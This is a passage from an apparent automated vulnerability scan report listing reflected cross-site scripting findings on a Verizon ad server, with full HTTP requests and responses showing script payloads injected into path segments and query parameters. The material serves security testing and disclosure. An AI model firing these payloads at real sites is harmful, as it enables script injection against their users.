GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net5f51e"><script>alert(1)</script>a6ae8c4670f/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 360
Content-Type: text/html
Cache-Control: private
Content-Length: 360

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net5f51e"><script>alert(1)</script>a6ae8c4670f/homepage/1410568378/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.533. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6e5"><script>alert(1)</script>06846ad054c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage9a6e5"><script>alert(1)</script>06846ad054c/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage9a6e5"><script>alert(1)</script>06846ad054c/L15/1413305581/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popserv
...[SNIP]...

2.534. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79022"><script>alert(1)</script>335f5d8d5b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top79022"><script>alert(1)</script>335f5d8d5b?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 351
Content-Type: text/html
Cache-Control: private
Content-Length: 351

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/2038399409/Top79022"><script>alert(1)</script>335f5d8d5b/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.535. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ee2"><script>alert(1)</script>38da2fb4b45 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/d3ee2"><script>alert(1)</script>38da2fb4b45?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:32 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PKCpLT10erias|T10erics|O10escOu; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 1517
Content-Type: text/html
Cache-Control: private
Content-Length: 1517

<IFRAME SRC="http://ad.doubleclick.net/adi/N3285.verizon/B2343920.19;sz=300x250;click0=http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/d3ee2"><script>alert(1)</script>38da2fb4b45/L24/18087710/UNKNOWN/VDSL/LMB_NAF_RON_300_2010_11_01/LowerMyBills_NAF_vznews_300_2009-06.html/726e6f58326b7a6e4b45494141693565?;ord=18087710?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=
...[SNIP]...

2.536. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [audio_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b69"><script>alert(1)</script>0309a201e2e was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=d9b69"><script>alert(1)</script>0309a201e2e&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=d9b69"><script>alert(1)</script>0309a201e2e&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.537. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [bbaw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee9e"><script>alert(1)</script>7bbb56b50b7 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=6ee9e"><script>alert(1)</script>7bbb56b50b7&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=6ee9e"><script>alert(1)</script>7bbb56b50b7&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.538. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [connex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed261"><script>alert(1)</script>91d9cdba7f8 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=ed261"><script>alert(1)</script>91d9cdba7f8&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
056/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=ed261"><script>alert(1)</script>91d9cdba7f8&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg
...[SNIP]...

2.539. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [fiostvown parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef8f7"><script>alert(1)</script>01f1c1e8700 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=ef8f7"><script>alert(1)</script>01f1c1e8700&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
formA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=ef8f7"><script>alert(1)</script>01f1c1e8700&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.540. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [fiosvoice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3bb0"><script>alert(1)</script>673dc6842f6 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=c3bb0"><script>alert(1)</script>673dc6842f6&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=c3bb0"><script>alert(1)</script>673dc6842f6&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.541. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [msp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d63ae"><script>alert(1)</script>51f4ccf50d was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=d63ae"><script>alert(1)</script>51f4ccf50d&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
6e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=d63ae"><script>alert(1)</script>51f4ccf50d&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.542. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c27"><script>alert(1)</script>d51ff14420e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&34c27"><script>alert(1)</script>d51ff14420e=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1366
Content-Type: text/html
Cache-Control: private
